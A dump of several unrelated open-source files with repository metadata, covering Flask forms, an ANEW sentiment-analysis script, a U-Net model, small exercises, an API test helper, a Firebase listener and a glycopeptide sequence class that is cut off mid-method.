    about_me = TextAreaField('About me')
    submit = SubmitField('Submit')
class EditProfileAdminForm(FlaskForm):
    """Administrator profile editor: exposes every editable user attribute,
    including account email, username, confirmation flag and role."""
    email = StringField('Email', validators=[Required(), Length(1, 64), Email()])
    username = StringField('Username', validators=[Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
                                                                                     'Usernames must have only letters, '
                                                                                     'numbers, dots or underscores')])
    confirmed = BooleanField('Confirmed')
    role = SelectField('Role', coerce=int)
    name = StringField('Real name', validators=[Length(0, 64)])
    location = StringField('Location', validators=[Length(0, 64)])
    about_me = TextAreaField('About me')
    submit = SubmitField('Submit')

    def __init__(self, user, *args, **kwargs):
        """Populate the role selector and remember the user being edited."""
        super(EditProfileAdminForm, self).__init__(*args, **kwargs)
        self.role.choices = [(role.id, role.name)
                             for role in Role.query.order_by(Role.name).all()]
        self.user = user

    def validate_email(self, field):
        # Bug fix: the original read ``self.user.eamil`` (typo), which raised
        # AttributeError and made duplicate-email validation dead code.
        if field.data != self.user.email and User.query.filter_by(email=field.data).first():
            raise ValidationError('Email already registered.')

    def validate_username(self, field):
        if field.data != self.user.username and User.query.filter_by(username=field.data).first():
            # Message typo fixed: 'already in user' -> 'already in use'.
            raise ValidationError('Username already in use.')
class PostForm(FlaskForm):
    # Markdown-enabled (PageDown) text composer.
    body = PageDownField("What's on your mind?", validators=[DataRequired()])
    submit = SubmitField('Submit')
| [
"zhidao666@gmail.com"
] | zhidao666@gmail.com |
82d5f0dee74684e1f7e9113adbdd737d287c5172 | 7b591fa0aa65721bca1761be28959cfb88f1c7ab | /src/AnewSentimentAnalysis.py | 68426fbef4337fd863869c65e3495595b76d87f5 | [] | no_license | hengee/SentimentAnalysis | a455540bc50393f444814dcb97186c3025ab9449 | d8323e89993ff78433c02f5b4b71f3776e948fba | refs/heads/master | 2020-06-24T11:27:18.672074 | 2017-11-10T20:28:43 | 2017-11-10T20:28:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,360 | py | """
Author: Doris Zhou
Date: September 29, 2017
Performs sentiment analysis on a text file using ANEW.
Parameters:
--dir [path of directory]
specifies directory of files to analyze
--file [path of text file]
specifies location of specific file to analyze
--out [path of directory]
specifies directory to create output files
--mode [mode]
takes either "median" or "mean"; determines which is used to calculate sentence sentiment values
"""
# add parameter to exclude duplicates? also mean or median analysis
import csv
import sys
import os
import statistics
import time
import argparse
from stanfordcorenlp import StanfordCoreNLP
nlp = StanfordCoreNLP('C:/Users/Doris/software tools/stanford-corenlp-full-2016-10-31')
from nltk import tokenize
from nltk.corpus import stopwords
stops = set(stopwords.words("english"))
anew = "../lib/EnglishShortened.csv"
# performs sentiment analysis on inputFile using the ANEW database, outputting results to a new CSV file in outputDir
def analyzefile(input_file, output_dir, mode):
"""
Performs sentiment analysis on the text file given as input using the ANEW database.
Outputs results to a new CSV file in output_dir.
:param input_file: path of .txt file to analyze
:param output_dir: path of directory to create new output file
:param mode: determines how sentiment values for a sentence are computed (median or mean)
:return:
"""
output_file = os.path.join(output_dir, "Output Anew Sentiment " + os.path.basename(input_file).rstrip('.txt') + ".csv")
# read file into string
with open(input_file, 'r') as myfile:
fulltext = myfile.read()
# end method if file is empty
if len(fulltext) < 1:
print('Empty file.')
return
from nltk.stem.wordnet import WordNetLemmatizer
lmtzr = WordNetLemmatizer()
# otherwise, split into sentences
sentences = tokenize.sent_tokenize(fulltext)
i = 1 # to store sentence index
# check each word in sentence for sentiment and write to output_file
with open(output_file, 'w', newline='') as csvfile:
fieldnames = ['Sentence ID', 'Sentence', 'Sentiment', 'Sentiment Label', 'Arousal', 'Dominance',
'# Words Found', 'Found Words', 'All Words']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
# analyze each sentence for sentiment
for s in sentences:
# print("S" + str(i) +": " + s)
all_words = []
found_words = []
total_words = 0
v_list = [] # holds valence scores
a_list = [] # holds arousal scores
d_list = [] # holds dominance scores
# search for each valid word's sentiment in ANEW
words = nlp.pos_tag(s.lower())
for index, p in enumerate(words):
# don't process stops or words w/ punctuation
w = p[0]
pos = p[1]
if w in stops or not w.isalpha():
continue
# check for negation in 3 words before current word
j = index-1
neg = False
while j >= 0 and j >= index-3:
if words[j][0] == 'not' or words[j][0] == 'no' or words[j][0] == 'n\'t':
neg = True
break
j -= 1
# lemmatize word based on pos
if pos[0] == 'N' or pos[0] == 'V':
lemma = lmtzr.lemmatize(w, pos=pos[0].lower())
else:
lemma = w
all_words.append(lemma)
# search for lemmatized word in ANEW
with open(anew) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if row['Word'].casefold() == lemma.casefold():
if neg:
found_words.append("neg-"+lemma)
else:
found_words.append(lemma)
v = float(row['valence'])
a = float(row['arousal'])
d = float(row['dominance'])
if neg:
# reverse polarity for this word
v = 5 - (v - 5)
a = 5 - (a - 5)
d = 5 - (d - 5)
v_list.append(v)
a_list.append(a)
d_list.append(d)
if len(found_words) == 0: # no words found in ANEW for this sentence
writer.writerow({'Sentence ID': i,
'Sentence': s,
'Sentiment': 'N/A',
'Sentiment Label': 'N/A',
'Arousal': 'N/A',
'Dominance': 'N/A',
'# Words Found': 0,
'Found Words': 'N/A',
'All Words': all_words
})
i += 1
else: # output sentiment info for this sentence
# get values
if mode == 'median':
sentiment = statistics.median(v_list)
arousal = statistics.median(a_list)
dominance = statistics.median(d_list)
else:
sentiment = statistics.mean(v_list)
arousal = statistics.mean(a_list)
dominance = statistics.mean(d_list)
# set sentiment label
label = 'neutral'
if sentiment > 6:
label = 'positive'
elif sentiment < 4:
label = 'negative'
writer.writerow({'Sentence ID': i,
'Sentence': s,
'Sentiment': sentiment,
'Sentiment Label': label,
'Arousal': arousal,
'Dominance': dominance,
'# Words Found': ("%d out of %d" % (len(found_words), len(all_words))),
'Found Words': found_words,
'All Words': all_words
})
i += 1
def main(input_file, input_dir, output_dir, mode):
    """
    Runs analyzefile on the appropriate files, provided that the input paths are valid.
    :param input_file: path of a single .txt file to analyze ('' if unused)
    :param input_dir: path of a directory of .txt files to analyze ('' if unused)
    :param output_dir: directory where output CSVs are created
    :param mode: 'median' or 'mean' aggregation, forwarded to analyzefile
    :return: None (terminates the process via sys.exit on invalid paths)
    """
    # Bug fix: the original tested ``len(output_dir) < 0``, which is never
    # true; ``== 0`` is the intended empty-string check.
    if len(output_dir) == 0 or not os.path.exists(output_dir):  # empty output
        print('No output directory specified, or path does not exist')
        sys.exit(0)
    elif len(input_file) == 0 and len(input_dir) == 0:  # empty input
        print('No input specified. Please give either a single file or a directory of files to analyze.')
        sys.exit(1)
    elif len(input_file) > 0:  # handle single file
        if os.path.exists(input_file):
            analyzefile(input_file, output_dir, mode)
        else:
            print('Input file "' + input_file + '" is invalid.')
            sys.exit(0)
    elif len(input_dir) > 0:  # handle directory
        if os.path.isdir(input_dir):
            directory = os.fsencode(input_dir)
            for file in os.listdir(directory):
                filename = os.path.join(input_dir, os.fsdecode(file))
                if filename.endswith(".txt"):
                    start_time = time.time()
                    print("Starting sentiment analysis of " + filename + "...")
                    analyzefile(filename, output_dir, mode)
                    print("Finished analyzing " + filename + " in " + str((time.time() - start_time)) + " seconds")
        else:
            print('Input directory "' + input_dir + '" is invalid.')
            sys.exit(0)
if __name__ == '__main__':
    # Command-line entry point: all arguments are optional strings.
    parser = argparse.ArgumentParser(description='Sentiment analysis with ANEW.')
    parser.add_argument('--file', type=str, dest='input_file', default='',
                        help='a string to hold the path of one file to process')
    parser.add_argument('--dir', type=str, dest='input_dir', default='',
                        help='a string to hold the path of a directory of files to process')
    parser.add_argument('--out', type=str, dest='output_dir', default='',
                        help='a string to hold the path of the output directory')
    parser.add_argument('--mode', type=str, dest='mode', default='mean',
                        help='mode with which to calculate sentiment in the sentence: mean or median')
    args = parser.parse_args()
    # run main and propagate its return value as the process exit status
    sys.exit(main(args.input_file, args.input_dir, args.output_dir, args.mode))
| [
"noreply@github.com"
] | hengee.noreply@github.com |
bf28bb9d66663bbea2f265248247d8092ce07621 | 1575df2b884ec1a5155ae7f2f8198ca7b9e0ca4a | /client.py | b15847e738c93eb1ee2dbb45292b276614618dfe | [] | no_license | hues-platform/energy-hub-server | cefaea24bea70a3bc0d668ebcad4c5076a2ec950 | ae278a9bf121b566b492719056f8c56f5beb2127 | refs/heads/master | 2021-01-01T18:20:41.779170 | 2017-07-25T21:33:21 | 2017-07-25T21:33:21 | 98,314,028 | 1 | 0 | null | 2017-07-25T21:33:22 | 2017-07-25T14:15:25 | null | UTF-8 | Python | false | false | 1,034 | py | """
An example of remotely solving a EHub Model.
"""
import json
import xmlrpc.client
import excel_to_request_format
# pylint: disable=all
def main():
    """Convert an example Excel model to the request format and solve it
    on a remote XML-RPC server, printing the decoded results."""
    # Example input: an Excel description of the energy hub model.
    file = 'excel_files/General_input_new_simple.xlsx'
    # Convert the Excel file into the request dictionary format.
    request = excel_to_request_format.convert(file)
    # Serialise the dictionary to a JSON string for transport.
    request = json.dumps(request)
    url = 'http://localhost:8080'  # The URL of the solver server
    # Connect to the server and solve the model held in ``request``.
    with xmlrpc.client.ServerProxy(url) as server:
        results = server.solve(request)
        # The server returns JSON; decode it before use.
        print(json.loads(results))
if __name__ == '__main__':
    main()
| [
"infogreytech@gmail.com"
] | infogreytech@gmail.com |
46cef7c62e51c1e77f3265fa82b86b6fd7bffc6e | da30c8804c123a0ab862ac89d5fd342caa4079d9 | /venv/lib/python3.6/rlcompleter.py | 197205cae89ce4a3abc8dfff6ce7fe245cd35951 | [] | no_license | wvs2/observatorio | 0ebc9dfa1037c028cdcc5232ff07fc437358031d | de14cd04678587bba0cefce2d6335826a626d6f6 | refs/heads/master | 2020-05-02T15:39:06.656098 | 2019-04-11T23:49:02 | 2019-04-11T23:49:02 | 178,048,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | /home/woshington/anaconda3/lib/python3.6/rlcompleter.py | [
"wvs2@cin.ufpe.br"
] | wvs2@cin.ufpe.br |
da12dffb6fec332184681c73c6578637a6f5cb99 | 0726de522b858dbbdbac86c976a0719855ed67e2 | /api/urls.py | 8c90ce7c770957c4651d426ef4842a85c2b70107 | [
"MIT"
] | permissive | gen1us2k/django-example | 5cf47e7edec573685fa4a611acb9a3c497483498 | 6bde1bb492cd6951e8d1b633d236448a0f485e84 | refs/heads/master | 2021-01-01T05:12:34.720093 | 2016-05-22T14:37:29 | 2016-05-22T14:37:29 | 59,410,183 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # -*- coding: utf-8 -*-
from django.conf.urls import patterns, url, include
from rest_framework.routers import DefaultRouter
from . import views
# The router auto-generates REST endpoints for each registered viewset;
# the third register() argument is the explicit basename for URL reversing.
router = DefaultRouter()
router.register('executors', views.ExecutorViewSet, 'executors')
router.register('customers', views.CustomerViewSet, 'customers')
router.register('tasks', views.TaskViewSet)
# All API routes are namespaced under /v1/.
urlpatterns = [
    url('^v1/', include(router.urls)),
]
| [
"minkin.andrew@gmail.com"
] | minkin.andrew@gmail.com |
cfd9b2138270784a7756ffc25d5909dc0473608d | a0b6b96f6324532625e64ceee0ae83920c0974c5 | /models/unet.py | 46c71144c9a425159851292ec1d31cdf68374102 | [
"MIT"
] | permissive | bbrangeo/pytorch-image-segmentation | 5ebf07055ff1216218b7ef5d4db4f769eb266b21 | 036236372bd85f48bfe33c6a89d7006fab800387 | refs/heads/master | 2020-08-17T01:00:38.061447 | 2019-03-12T15:49:49 | 2019-03-12T15:49:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,423 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import warnings
warnings.filterwarnings("ignore")
class Ublock(torch.nn.Module):
    """The basic U-Net building block: two stacked conv + ReLU layers."""

    def __init__(self, in_channels, out_channels, kernel_size=3, padding=1):
        super().__init__()
        # Two 3x3 convolutions (padding keeps the spatial size), each
        # followed by an in-place ReLU. Batch norm is intentionally omitted.
        layers = [
            nn.Conv2d(in_channels, out_channels, kernel_size, padding=padding),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, out_channels, kernel_size, padding=padding),
            nn.ReLU(inplace=True),
        ]
        self.net = torch.nn.Sequential(*layers)

    def forward(self, x):
        """Apply both conv/ReLU pairs to ``x``."""
        return self.net(x)
class UpSamplingPadding(torch.nn.Module):
    """Decoder step: bilinearly upsample a feature map, pad it to match the
    encoder skip connection, concatenate the two and run a Ublock."""

    def __init__(self, in_channels, out_channels, bilinear=True):
        super(UpSamplingPadding, self).__init__()
        # NOTE: ``bilinear`` is accepted but unused; upsampling is always bilinear.
        self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.ublock = Ublock(in_channels=self.in_channels, out_channels=self.out_channels)

    def forward(self, x1, x2):
        """Upsample ``x1``, pad it to ``x2``'s spatial size, concat, convolve."""
        upsampled = self.up(x1)
        # Spatial mismatches appear when encoder sizes were odd; pad the
        # upsampled map (input is CHW) so it lines up with the skip tensor.
        # See https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70
        # for the padding rationale.
        dh = x2.size()[2] - upsampled.size()[2]
        dw = x2.size()[3] - upsampled.size()[3]
        padded = F.pad(upsampled, (dw // 2, dw - dw // 2, dh // 2, dh - dh // 2))
        merged = torch.cat([x2, padded], dim=1)
        return self.ublock(merged)
class Unet(nn.Module):
    """U-Net encoder/decoder for dense per-pixel classification.

    forward() maps a (batch, input_channels, H, W) tensor to a
    (batch, n_classes, H, W) tensor of sigmoid activations.
    """

    def __init__(self, input_channels=3, input_width=480, input_height=360, n_classes=10):
        super(Unet, self).__init__()
        self.input_channels = input_channels
        self.input_width = input_width
        self.input_height = input_height
        self.n_classes = n_classes
        # Contracting path: double-conv blocks separated by 2x2 max pools.
        self.conv1 = Ublock(input_channels, 64, kernel_size=3)
        self.pool2 = torch.nn.MaxPool2d(kernel_size=2)
        self.conv2 = Ublock(64, 128, kernel_size=3)
        self.pool3 = torch.nn.MaxPool2d(kernel_size=2)
        self.conv3 = Ublock(128, 256, kernel_size=3)
        self.pool4 = torch.nn.MaxPool2d(kernel_size=2)
        self.conv4 = Ublock(256, 512, kernel_size=3)
        self.pool5 = torch.nn.MaxPool2d(kernel_size=2)
        self.conv5 = Ublock(512, 512, kernel_size=3)
        # Expanding path: input channels include the concatenated skip maps.
        self.up1 = UpSamplingPadding(512 + 512, 256)
        self.up2 = UpSamplingPadding(256 + 256, 128)
        self.up3 = UpSamplingPadding(128 + 128, 64)
        self.up4 = UpSamplingPadding(128, 64)
        self.outputconv = torch.nn.Conv2d(64, self.n_classes, kernel_size=1)

    def forward(self, x):
        """Run encoder, decoder with skip connections, then the 1x1 head."""
        # Downsampling phase (feature maps retained for skip connections).
        conv1 = self.conv1(x)
        pool2 = self.pool2(conv1)
        conv2 = self.conv2(pool2)
        pool3 = self.pool3(conv2)
        conv3 = self.conv3(pool3)
        pool4 = self.pool4(conv3)
        conv4 = self.conv4(pool4)
        pool5 = self.pool5(conv4)
        conv5 = self.conv5(pool5)
        # Upsampling phase.
        up1 = self.up1(conv5, conv4)
        up2 = self.up2(up1, conv3)
        up3 = self.up3(up2, conv2)
        up4 = self.up4(up3, conv1)
        # torch.sigmoid replaces the deprecated F.sigmoid alias; the
        # computation is identical.
        return torch.sigmoid(self.outputconv(up4))
if __name__ == "__main__":
    import numpy as np

    # Smoke test: one forward/backward pass on an all-zero image batch.
    batch_size = 1
    n_channels = 3
    input_width = 480
    input_height = 360
    n_classes = 10
    nz = torch.Tensor(np.zeros((batch_size, n_channels, input_width, input_height)))
    # Bug fix: CrossEntropyLoss with a (N, C, d1, d2) input expects a
    # (N, d1, d2) target; the original flat (N, d1*d2) target raised a
    # shape-mismatch error.
    uz = torch.ones(batch_size, input_width, input_height, dtype=torch.long)
    model = Unet()
    outputs = model.forward(nz)
    criterion = nn.CrossEntropyLoss()
    learning_rate = 1e-4
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
    print(outputs.shape, uz.shape)
    loss = criterion(outputs, uz)
    loss.backward()
'''
for t in range(500):
# Forward pass: compute predicted y by passing x to the model.
y_pred = model(x)
# Compute and print loss.
loss = loss_fn(y_pred, y)
print(t, loss.item())
# Before the backward pass, use the optimizer object to zero all of the
# gradients for the variables it will update (which are the learnable
# weights of the model). This is because by default, gradients are
# accumulated in buffers( i.e, not overwritten) whenever .backward()
# is called. Checkout docs of torch.autograd.backward for more details.
optimizer.zero_grad()
# Backward pass: compute gradient of the loss with respect to model
# parameters
loss.backward()
# Calling the step function on an Optimizer makes an update to its
# parameters
optimizer.step()
'''
'''
import hiddenlayer as hl
hl_graph = hl.build_graph(model, nz)
hl_graph.save("xxx", format="png")
''' | [
"hrm@cin.ufpe.br"
] | hrm@cin.ufpe.br |
b0f34c881a1959c5d0174326174bb7dd21c92f3e | b6635c2cc6ce6d17da4d2aed5c17281ff50255ef | /12week/Code10-07.py | 4eaa7d992d4a8da07f785e2f1f0164dce629a18c | [] | no_license | mi642/Python_DataStructure | fcebbef7e4dd895eb1c39c3313f8937c92b43896 | 774c52a6fa7c410d0e00dce5f757c8c4b682710d | refs/heads/master | 2023-05-28T15:59:10.409648 | 2021-06-10T07:16:34 | 2021-06-10T07:16:34 | 344,525,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | def gugu(dan, num):
print("%d x %d = %d" % (dan, num, dan * num))
if (num < 9):
gugu(dan, num + 1)
# Print the 2..9 multiplication tables, each preceded by a header line.
for dan in range(2, 10):
    print("## %d단 ##" % dan)
gugu(dan, 1) | [
"emira1239@naver.com"
] | emira1239@naver.com |
79e8cc47e84840e0528b0ceb9ba10e560f07f8b0 | e22140d66b84b5ad05b6bbc116f224338fd361e1 | /assignment5.py | 152a33675bd6705db13941ef40b095ead659d99a | [] | no_license | SimranKucheria/PPL-Assignments | 958c86859c0965762714e09fce1c564b4a410115 | 318d5a26da831124067e18b8ff161d7dbe496394 | refs/heads/master | 2022-07-16T23:47:30.555037 | 2020-05-18T12:59:17 | 2020-05-18T12:59:17 | 264,939,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | try:
    # Echo Assignment.txt line by line (print adds a second newline per line).
    file = open("Assignment.txt","r")
    for line in file:
        print(line)
# NOTE(review): the bare ``except`` hides every failure (not only a missing
# file) and ``file`` is never closed -- prefer ``with open(...)`` together
# with ``except FileNotFoundError``.
except:
    print("File Doesn't exist")
| [
"noreply@github.com"
] | SimranKucheria.noreply@github.com |
2993ce92666d43ec9e6a520bf4027609ca676413 | 221e3afe0ef457c088d9c7725b5a1cc70d77b16e | /base/migrations/0002_remove_category_content.py | 418f3ac3266d248bb9952513d02122a2b10c217b | [] | no_license | Rockstreet/titov_base | 6615087518b33635da6fec4d73716670c0b25d5a | 612d842c423ffc3754e90a463029e9415aacb318 | refs/heads/master | 2021-01-19T05:22:06.940949 | 2017-04-12T16:09:06 | 2017-04-12T16:09:06 | 87,428,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-07 09:52
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated (Django 1.11): removes the ``content`` field from the
    # ``Category`` model; applies on top of the initial base migration.
    dependencies = [
        ('base', '0001_initial'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='category',
            name='content',
        ),
    ]
| [
"ivan.tolkachev@gmail.com"
] | ivan.tolkachev@gmail.com |
f7818f18a8db54a2d37a4d2062a7d2c5ce841a31 | 2618895cfc1ccdfc5d2db6e9f6f055ffecb35bf9 | /New folder/enemy.py | 9ff3ee4843ee716d6884d336e262a6377d80cbb6 | [] | no_license | MechGodzilla/tryingbasicrpg | ea26f08012eb2ef9f8bb53ecbc3713178d5d4401 | a0729841b8a5e70f647efd7cacfd7bca02858c75 | refs/heads/master | 2021-01-18T16:38:43.186757 | 2017-04-12T00:32:13 | 2017-04-12T00:32:13 | 86,752,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | # A better approach to this and the video's method is inheritance, create an Enemy() class as you said above and then have other classes such as
# Goblin(Enemy) inherit from the Enemy(object) with the super().__init__() method.
# https://stackoverflow.com/questions/23117717/python-super-init-inheritance
# from player import Player
#
#
# class Goblin(Player):
# def __init__(self, name):
# super(Goblin, self).__init__(name)
# self.maxhealth = 50
# self.health = self.maxhealth
# self.attack = 5
# self.goldGain = 10
#
#
# class Zombie(Player):
# def __init__(self, name):
# super(Zombie, self).__init__(name)
# self.maxhealth = 70
# self.health = self.maxhealth
# self.attack = 7
# self.goldGain = 15
class Goblin:
    # Weak enemy archetype (see the commented-out inheritance sketch above
    # for the suggested shared Enemy base class).
    def __init__(self, name):
        self.name = name
        self.maxhealth = 50
        self.health = self.maxhealth  # spawns at full health
        self.attack = 5
        self.goldGain = 10  # presumably gold granted on defeat -- confirm in game loop
class Zombie:
    """A tougher enemy: more health and damage, bigger gold reward."""

    def __init__(self, name):
        """Create a zombie called *name*, starting at full health."""
        self.name = name
        self.maxhealth = 70
        self.attack = 7
        self.goldGain = 15
        # Spawn at the health cap.
        self.health = self.maxhealth
"serpentining@gmail.com"
] | serpentining@gmail.com |
15f2bf4dbe2c26ca77bd77f061fe0fada00251f9 | 005b5c3fd045d59bbe34a54cd6b85904c7443d2e | /arrays_and_strings/group_anagrams.py | e31e11314cd010b194fc4ee29de67c6c3b3b74d6 | [] | no_license | karthik4636/practice_problems | 84a9d7df6a03adeadea7058024f078c292c70c4a | 8e87b10bd77289b891591b770a6f7adc2c00fdf0 | refs/heads/master | 2021-07-11T15:02:07.484510 | 2020-06-23T03:41:05 | 2020-06-23T03:41:05 | 152,669,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | # https://leetcode.com/problems/group-anagrams/
class Solution:
    """Group words that are anagrams of one another (LeetCode 49)."""

    def get_dict(self, str):
        """Return a character -> occurrence-count mapping for *str*."""
        counts = {}
        for ch in str:
            counts[ch] = counts.get(ch, 0) + 1
        return counts

    def groupAnagrams(self, strs):
        """
        :type strs: List[str]
        :rtype: List[List[str]]
        """
        groups = {}
        for word in strs:
            # Two words are anagrams iff their character counts match, so a
            # sorted tuple of (char, count) pairs is a canonical signature.
            signature = tuple(sorted(self.get_dict(word).items()))
            groups.setdefault(signature, []).append(word)
        return list(groups.values())
# Ad-hoc manual check of the solution using the LeetCode sample input.
s = Solution()
a=s.groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"])
b=1  # NOTE(review): unused scratch value - presumably a breakpoint anchor.
"karthik4636@gmail.com"
] | karthik4636@gmail.com |
f77bf2b8e7706767ba2b4ecf89cd1e873d538f5e | eceec8787ae18d1bac8fef5f115d7a257c00b905 | /pageObjects/api/create_board.py | 3589a834ee307792f947d159f2b7099cf299646c | [] | no_license | saurabhpiyush1187/qaassigment_oldreq | 6ef1e454513f0df56738f290a0aee7a62638e637 | cdc35d6841468072d40084a85ef85eb09a358c5e | refs/heads/main | 2023-03-06T02:25:22.462982 | 2021-02-15T08:46:17 | 2021-02-15T08:46:17 | 339,042,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,513 | py | import os
import json
from utilities.config_utils import ConfigUtils
from core.api.api_helper import RequestBuilder
from pageObjects.api.common_utils import CommonUtils
from utilities.customLogger import LogGen
class CreateBoard:
    """API object for creating a Springboard board and verifying it exists."""

    # Class-level collaborators: every CreateBoard instance shares the same
    # config reader, HTTP request builder, common utils and logger.
    config_utils = ConfigUtils(os.getcwd())
    request_builder = RequestBuilder()
    mi_common_utils = CommonUtils()
    logger = LogGen.loggen()

    def __init__(self):
        # Per-call state, populated by create_board()/verify_created_board().
        self.response = ""
        self.response_content= ""
        self.str_request_url = ""
        self.uuid=""
        self.str_auth_token =""

    def validate_reponse(self):
        """
        Description:
            | This method calls the is_responsevalid from comon_utils to validate the response code
        :return: True when the last response's status code is acceptable
        """
        bln_response = self.mi_common_utils.is_responsevalid(self.response)
        return bln_response

    def create_board(self):
        """POST a new board; return (board uuid, auth token) on success, else None."""
        self.str_auth_token = self.mi_common_utils.springboard_get_authtoken()
        # Endpoint description (URL pieces, headers, payload, HTTP verb) comes
        # from springboard_description.yml.
        dict_service_disc = self.config_utils.get_servicedescription("springboard_description.yml", "create_board")
        str_request_url = dict_service_disc["target_url"] + dict_service_disc["endpoint"] + dict_service_disc[
            "queryparams"]
        headers = dict_service_disc["headers"]
        headers["Authorization"] = "Bearer "+self.str_auth_token
        payload = dict_service_disc["payload"]
        self.response = self.request_builder.call_request(dict_service_disc["method"], str_request_url,
                                                          headers, pstr_payload=payload)
        self.response_content = self.response.content
        bln_response1 = self.mi_common_utils.is_reponsegenerated(self.response)
        bln_validate_response = self.validate_reponse()
        response_json = json.loads(self.response_content)
        if bln_response1 and bln_validate_response:
            self.logger.info("*****Board is created successfully***")
            # Cache the uuid so callers (and later verification) can use it.
            self.uuid = response_json['data']['uuid']
            return self.uuid,self.str_auth_token
        else:
            self.logger.info("*****Board is not created successfully***Response code"+ str(self.response.status_code) )
            return None

    def verify_created_board(self,uuid):
        """GET the board by ``uuid``; return True when the server echoes the same uuid."""
        dict_service_disc = self.config_utils.get_servicedescription("springboard_description.yml", "get_board")
        str_request_url = dict_service_disc["target_url"] + dict_service_disc["endpoint"] +"/"+ str(uuid)+ dict_service_disc[
            "queryparams"]
        headers = dict_service_disc["headers"]
        # Relies on create_board() having been called first to cache the token.
        headers["Authorization"] = "Bearer "+self.str_auth_token
        payload = dict_service_disc["payload"]
        self.response = self.request_builder.call_request(dict_service_disc["method"], str_request_url,
                                                          headers, pstr_payload=payload)
        self.response_content = self.response.content
        bln_response1 = self.mi_common_utils.is_reponsegenerated(self.response)
        bln_validate_response = self.validate_reponse()
        response_json = json.loads(self.response_content)
        if bln_response1 and bln_validate_response:
            pstr_uuid = response_json['data']['uuid']
            if pstr_uuid == uuid:
                self.logger.info("*****Board is verified successfully***")
                return True
            # NOTE(review): a successful response whose uuid does NOT match
            # falls through and returns None (not False) - confirm intended.
        else:
            self.logger.info("*****Board is not verified successfully***Response code"+ str(self.response.status_code) )
            return False
| [
"saurabhpiyush@spglobal.com"
] | saurabhpiyush@spglobal.com |
64015cf8bc203dc2e3de671c7244cb1c210ceae3 | 26e828ef4dfd9b5f27e4e59aa053043ae4971554 | /bejay_dev/IoT/get_firebase.py | 6be23b02de481966a58ce07980d704898191fed4 | [] | no_license | hamzaMahdi/myjay-bot | d29e2000f3e851e690ba3be476d5b682ebb687a3 | f38dbabf801856e3d51aa022c05aad4690c1ae2a | refs/heads/main | 2023-08-28T03:48:38.292386 | 2021-11-03T02:00:49 | 2021-11-03T02:00:49 | 361,912,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | import pyrebase
import time
# Firebase project credentials (removed before publishing this script).
config = {
    #config removed for privacy
}
# Connect to the Realtime Database for this project.
firebase = pyrebase.initialize_app(config)
db = firebase.database()
# Polling alternative kept for reference; superseded by the stream below.
# while True:
#     user = db.child("users").get()
#     print(user.val()) # users
def stream_handler(message):
    """Print the event type, path and payload name of one Firebase stream message."""
    event_kind = message["event"]            # e.g. "put"
    event_path = message["path"]             # e.g. "/-K7yGTTEp7O549EzTYtI"
    payload_name = message["data"].get('name')
    print(event_kind)
    print(event_path)
    print(payload_name)
# Open a realtime stream on /users; stream_handler runs for each change event.
my_stream = db.child("users").stream(stream_handler)
| [
"hamzamahdi96@gmail.com"
] | hamzamahdi96@gmail.com |
2d32855077a8fd0594875c11d0c248fa27e1c3d9 | df24807455a5bc4db794d79cc88e6bde93d3d404 | /HH_glycopeptide - KK testing v2/sequencespace.py | e7d7bfc3a84a3b32c1db46ef3e02d0eb112fb0cd | [] | no_license | GlycReSoft2/glycopeptide-testing | 075b594025c95a9c9cfb79fcf802bd326459238f | 574bc5b44ef8a562e2676aca24062b04f4bfeb17 | refs/heads/master | 2021-01-23T11:49:35.306116 | 2014-05-22T17:33:19 | 2014-05-22T17:33:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,178 | py | from sequence import Sequence
from operator import and_
from functools import reduce
from modification import Modification
from residue import Residue
import copy
import itertools
import warnings
class SequenceSpace:
    """Generate all theoretical glycopeptide sequences."""

    def __init__(self, seq, glycan_compo, glycan_sites, mod_list):
        """
        seq -- sequence code
        glycan_compo -- glycan compositions, dict.
        glycan_sites -- sets of candidate sites for glycosylation
        mod_list -- list of modifications.
        """
        self.seq = Sequence(seq)  # Sequence object
        self.glycan_composition = glycan_compo
        self.candidate_sites = glycan_sites
        self.modifications = mod_list

    def getTheoreticalSequence(self, num_sites):
        """Return all modified sequences bearing exactly ``num_sites`` HexNAc groups.

        num_sites -- number of glycosylation sites to occupy.

        Enumerates every placement of the configured modifications
        (odometer-style over ``ix_bound``) and, for each valid placement,
        appends one sequence per combination of free glycosylation sites.
        """
        seq_space = []
        n = len(self.modifications)

        # ix_bound[k] lists the candidate placements for modification k; each
        # placement is a tuple of residue indices.
        ix_bound = []
        for mod in self.modifications:
            if mod.position != -1:
                # Explicit position: exactly one placement holding one site.
                # BUG FIX: was ``ix_bound.append((mod.position,))`` which made
                # the placement *list* a bare tuple of ints, so downstream
                # ``set().union(*ix_sites)`` and the placement iteration below
                # would operate on a plain int.
                ix_bound.append([(mod.position,)])
            elif mod.target != '':
                # All residues whose name matches the modification target.
                ix_list = [ix for ix in range(self.seq.length)
                           if self.seq.at(ix)[0].name == mod.target]
                ix_bound.append(list(itertools.combinations(ix_list, mod.number)))
            else:
                raise Exception('Unqualified modification!')

